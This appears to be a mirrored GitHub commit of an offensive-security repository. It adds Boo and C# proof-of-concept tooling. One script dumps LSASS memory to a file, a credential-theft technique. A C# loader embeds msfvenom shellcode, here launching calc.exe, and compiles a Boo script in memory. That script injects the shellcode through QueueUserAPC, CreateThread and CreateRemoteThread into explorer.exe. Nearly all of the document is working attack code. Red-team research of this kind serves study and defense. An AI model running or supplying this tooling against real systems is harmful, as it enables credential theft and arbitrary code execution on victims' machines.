mirror of
https://github.com/byt3bl33d3r/OffensiveDLR
synced 2026-06-06 15:24:29 +00:00
Initial Commit
This commit is contained in:
Executable
+153
File diff suppressed because one or more lines are too long
Executable
+25
@@ -0,0 +1,25 @@
|
||||
import System.Runtime.InteropServices
|
||||
from System.Diagnostics import Process
|
||||
from System.IO import FileStream, FileMode, FileAccess,FileShare
|
||||
|
||||
/*
|
||||
Author: Marcello Salvati (@byt3bl33d3r)
|
||||
License: BSD 3-Clause
|
||||
|
||||
This Boolang source file can be run directly with the booi.exe interpreter or using the embedded compiler in runBoo.cs
|
||||
|
||||
*/
|
||||
|
||||
[DllImport("Dbghelp.dll", EntryPoint:"MiniDumpWriteDump")]
|
||||
def minidumpwritedump(hProcess as int, ProcessId as int, hFile as int, DumpType as int, ExceptionParam as int, UserStreamParam as int, CallbackParam as int):
|
||||
pass
|
||||
|
||||
def main():
|
||||
procname = 'lsass'
|
||||
ids = Process.GetProcessesByName(procname)
|
||||
for pid in ids:
|
||||
file = "C:\\MIRIAM.dmp"
|
||||
fs = FileStream(file, FileMode.Create, FileAccess.ReadWrite, FileShare.Write)
|
||||
minidumpwritedump(pid.Handle, pid.Id, fs.Handle,0x00000002,0,0,0)
|
||||
|
||||
print "Dumped to $file"
|
||||
@@ -0,0 +1,114 @@
|
||||
using System;
|
||||
using System.Text;
|
||||
using System.Reflection;
|
||||
|
||||
using Boo.Lang.Compiler;
|
||||
using Boo.Lang.Compiler.IO;
|
||||
using Boo.Lang.Compiler.Pipelines;
|
||||
|
||||
/*
|
||||
Author: Marcello Salvati (@byt3bl33d3r)
|
||||
License: BSD 3-Clause
|
||||
|
||||
1) Download the latest stable version of Boolang https://github.com/boo-lang/boo/releases
|
||||
|
||||
2) In the directory with the Boolang DLLs compile with:
|
||||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:Boo.Lang.Compiler.dll,Boo.Lang.dll,Boo.Lang.Parser.dll /t:exe runBoo.cs
|
||||
|
||||
3) Usage: runBoo.exe shellcode.boo <InjectionMethod> <x86|x64>
|
||||
Example: runBoo.exe shellcode.boo InjectRemote
|
||||
|
||||
See shellcode.boo for the injection methods available
|
||||
|
||||
This PoC won't work without the Boolang DLLs and shellcode.boo file in the same directory but you can easily fix that with a little C# trickery :)
|
||||
|
||||
References:
|
||||
- https://github.com/boo-lang/boo/wiki/Scripting-with-the-Boo.Lang.Compiler-API
|
||||
- https://github.com/boo-lang/boo/wiki/Invoke-Native-Methods-with-DllImport
|
||||
- https://github.com/pwndizzle/c-sharp-memory-injection
|
||||
*/
|
||||
|
||||
namespace ConsoleApplication1
|
||||
{
|
||||
class Program
|
||||
{
|
||||
public static void Main(string[] args)
|
||||
{
|
||||
|
||||
// msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp
|
||||
byte[] sc64 = new byte[276] {
|
||||
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
|
||||
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
|
||||
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
|
||||
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
|
||||
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
|
||||
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
|
||||
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
|
||||
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
|
||||
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
|
||||
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
|
||||
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
|
||||
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
|
||||
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
|
||||
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
|
||||
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
|
||||
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
|
||||
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
|
||||
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
|
||||
0x63,0x2e,0x65,0x78,0x65,0x00 };
|
||||
|
||||
// msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -f csharp
|
||||
byte[] sc86 = new byte[193] {
|
||||
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
|
||||
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
|
||||
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
|
||||
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
|
||||
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
|
||||
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
|
||||
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
|
||||
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
|
||||
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
|
||||
0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
|
||||
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
|
||||
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
|
||||
0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };
|
||||
|
||||
BooCompiler compiler = new BooCompiler();
|
||||
//compiler.Parameters.Input.Add(new StringInput("print 'Doot Doot'!")); :)
|
||||
compiler.Parameters.Input.Add(new FileInput(args[0]));
|
||||
compiler.Parameters.Pipeline = new CompileToMemory();
|
||||
compiler.Parameters.Ducky = true;
|
||||
|
||||
CompilerContext context = compiler.Run();
|
||||
//Note that the following code might throw an error if the Boo script had bugs.
|
||||
//Poke context.Errors to make sure.
|
||||
if (context.GeneratedAssembly != null)
|
||||
{
|
||||
Type scriptModule = context.GeneratedAssembly.GetType("Inject");
|
||||
MethodInfo injectMain = scriptModule.GetMethod(args[1]);
|
||||
|
||||
if (args.Length == 3)
|
||||
{
|
||||
if (args[2] == "x86")
|
||||
{
|
||||
Console.WriteLine("Using x86 Shellcode");
|
||||
string output = (string)injectMain.Invoke(null, new object[] {sc86} );
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
Console.WriteLine("Using x64 Shellcode");
|
||||
string output = (string)injectMain.Invoke(null, new object[] {sc64} );
|
||||
Console.WriteLine(output);
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
foreach (CompilerError error in context.Errors)
|
||||
Console.WriteLine(error);
|
||||
}
|
||||
|
||||
Console.WriteLine("Boo!");
|
||||
}
|
||||
}
|
||||
}
|
||||
Executable
+144
@@ -0,0 +1,144 @@
|
||||
import System.Runtime.InteropServices
|
||||
from System.Diagnostics import Process
|
||||
from System import IntPtr
|
||||
|
||||
/*
|
||||
Author: Marcello Salvati (@byt3bl33d3r)
|
||||
License: BSD 3-Clause
|
||||
|
||||
This Boolang source file can be run directly with the booi.exe interpreter or using the embedded compiler in runBoo.cs/Invoke-JumpScare.ps1
|
||||
|
||||
References:
|
||||
- https://github.com/boo-lang/boo/wiki/Scripting-with-the-Boo.Lang.Compiler-API
|
||||
- https://github.com/boo-lang/boo/wiki/Invoke-Native-Methods-with-DllImport
|
||||
- https://github.com/pwndizzle/c-sharp-memory-injection
|
||||
*/
|
||||
|
||||
class Inject:
|
||||
|
||||
[DllImport("kernel32.dll")]
|
||||
def OpenProcess(dwDesiredAccess as int, bInheritHandle as bool, dwProcessID as int) as int:
|
||||
pass
|
||||
|
||||
[DllImport("kernel32.dll")]
|
||||
def VirtualAllocEx(hProcess as int, lpAddress as int, dwSize as int, flNewProtect as uint, lpflOldProtect as uint) as int:
|
||||
pass
|
||||
|
||||
[DllImport("kernel32.dll")]
|
||||
def VirtualProtectEx(hProcess as int, lpAddress as int, dwSize as int, flNewProtect as uint, lpflOldProtect as uint) as bool:
|
||||
pass
|
||||
|
||||
[DllImport("kernel32.dll")]
|
||||
def WriteProcessMemory(hProcess as int, lpBaseAddress as int, lpBuffer as (byte), nSize as int, lpNumberOfBytesWritten as int) as bool:
|
||||
pass
|
||||
|
||||
[DllImport("kernel32.dll")]
|
||||
def OpenThread(dwDesiredAccess as int, bInheritHandle as bool, dwThreadId as int) as int:
|
||||
pass
|
||||
|
||||
[DllImport("kernel32.dll")]
|
||||
def QueueUserAPC(pfnAPC as int, hThread as int, dwData as int) as int:
|
||||
pass
|
||||
|
||||
[DllImport("kernel32.dll")]
|
||||
def VirtualAlloc(lpStartAddr as int, size as int, flAllocationType as uint, flProtect as uint) as int:
|
||||
pass
|
||||
|
||||
[DllImport("kernel32.dll")]
|
||||
def CreateThread(lpThreadAttributes as int, dwStackSize as int, lpStartAddress as int, param as int, dwCreationFlags as int, lpThreadId as int) as int:
|
||||
pass
|
||||
|
||||
[DllImport("kernel32.dll")]
|
||||
def CreateRemoteThread(hProcess as int, lpThreadAttributes as int, dwStackSize as uint, lpStartAddress as int, lpParameter as int, dwCreationFlags as uint, lpThreadId as int) as int:
|
||||
pass
|
||||
|
||||
[DllImport("kernel32.dll")]
|
||||
def WaitForSingleObject(hHandle as int, dwMilliseconds as long):
|
||||
pass
|
||||
|
||||
public static def InjectQueueUserAPC(sc as (byte)):
|
||||
# Process Privileges
|
||||
PROCESS_VM_OPERATION = 0x0008 cast int
|
||||
PROCESS_VM_WRITE = 0x0020 cast int
|
||||
PROCESS_VM_READ = 0x0010 cast int
|
||||
|
||||
# Memory Permissions
|
||||
MEM_COMMIT = 0x1000 cast uint
|
||||
PAGE_EXECUTE_READWRITE = 0x40 cast uint
|
||||
PAGE_EXECUTE_READ = 0x20 cast uint
|
||||
|
||||
# Thread Permissions
|
||||
SUSPEND_RESUME = (0x0002) cast int
|
||||
GET_CONTEXT = (0x0008) cast int
|
||||
SET_CONTEXT = (0x0010) cast int
|
||||
THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT
|
||||
|
||||
targetProcess = Process.GetProcessesByName("explorer")[0]
|
||||
procHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id)
|
||||
print "procHandle = $procHandle"
|
||||
|
||||
resultPtr = VirtualAllocEx(procHandle cast IntPtr, 0, sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
|
||||
print "resultPtr = $resultPtr"
|
||||
|
||||
bytesWritten as int = 0;
|
||||
resultBool = WriteProcessMemory(procHandle cast IntPtr, resultPtr cast IntPtr, sc, sc.Length, bytesWritten)
|
||||
print "WriteProcessMemory = $resultBool, bytesWritten = $bytesWritten"
|
||||
|
||||
oldProtect as uint = 0
|
||||
resultBool = VirtualProtectEx(procHandle cast IntPtr, resultPtr cast IntPtr, sc.Length, PAGE_EXECUTE_READ, oldProtect)
|
||||
print "VirtualProtectEx = $resultBool, oldProtect = $oldProtect"
|
||||
|
||||
for thread in targetProcess.Threads:
|
||||
tHandle = OpenThread(THREAD_HIJACK, false, thread.Id cast int)
|
||||
print "tHandle = $tHandle"
|
||||
|
||||
ptr = QueueUserAPC(resultPtr cast IntPtr, tHandle, 0)
|
||||
print "QueueUserAPC = $ptr"
|
||||
|
||||
print "Injected"
|
||||
|
||||
public static def InjectSelf(sc as (byte)):
|
||||
MEM_COMMIT = 0x1000 cast uint
|
||||
PAGE_EXECUTE_READWRITE = 0x40 cast uint
|
||||
|
||||
currentProcess = Process.GetCurrentProcess()
|
||||
threadId = 0
|
||||
pinfo = 0
|
||||
|
||||
funcAddr = VirtualAlloc(0, sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
|
||||
print "funcAddr = $funcAddr"
|
||||
Marshal.Copy(sc, 0 , funcAddr cast IntPtr, sc.Length)
|
||||
|
||||
//oldProtect as uint = 0
|
||||
//resultBool = VirtualProtectEx(currentProcess.Handle cast IntPtr, funcAddr cast IntPtr, sc.Length, PAGE_EXECUTE_READWRITE, oldProtect)
|
||||
//print "VirtualProtectEx = $resultBool, oldProtect = $oldProtect"
|
||||
|
||||
hThread = CreateThread(0, 0, funcAddr, pinfo, 0 ,threadId)
|
||||
print "hThread = $hThread"
|
||||
WaitForSingleObject(hThread, 0xFFFFFFFF)
|
||||
print "Injected"
|
||||
|
||||
public static def InjectRemote(sc as (byte)):
|
||||
# Process Privileges
|
||||
PROCESS_VM_OPERATION = 0x0008 cast int
|
||||
PROCESS_VM_WRITE = 0x0020 cast int
|
||||
PROCESS_VM_READ = 0x0010 cast int
|
||||
PROCESS_ALL = 0x1F0FFF cast int
|
||||
|
||||
# Memory Permissions
|
||||
MEM_COMMIT = 0x1000 cast uint
|
||||
PAGE_EXECUTE_READWRITE = 0x40 cast uint
|
||||
|
||||
targetProcess = Process.GetProcessesByName("explorer")[0]
|
||||
procHandle = OpenProcess(PROCESS_ALL, false, targetProcess.Id)
|
||||
print "procHandle = $procHandle"
|
||||
|
||||
resultPtr = VirtualAllocEx(procHandle cast IntPtr, 0, sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
|
||||
print "resultPtr = $resultPtr"
|
||||
|
||||
bytesWritten as int = 0;
|
||||
resultBool = WriteProcessMemory(procHandle cast IntPtr, resultPtr cast IntPtr, sc, sc.Length, bytesWritten)
|
||||
print "WriteProcessMemory = $resultBool, bytesWritten = $bytesWritten"
|
||||
|
||||
CreateRemoteThread(procHandle cast IntPtr, 0, 0, resultPtr cast IntPtr, 0, 0, 0)
|
||||
print "Injected"
|
||||
Reference in New Issue
Block a user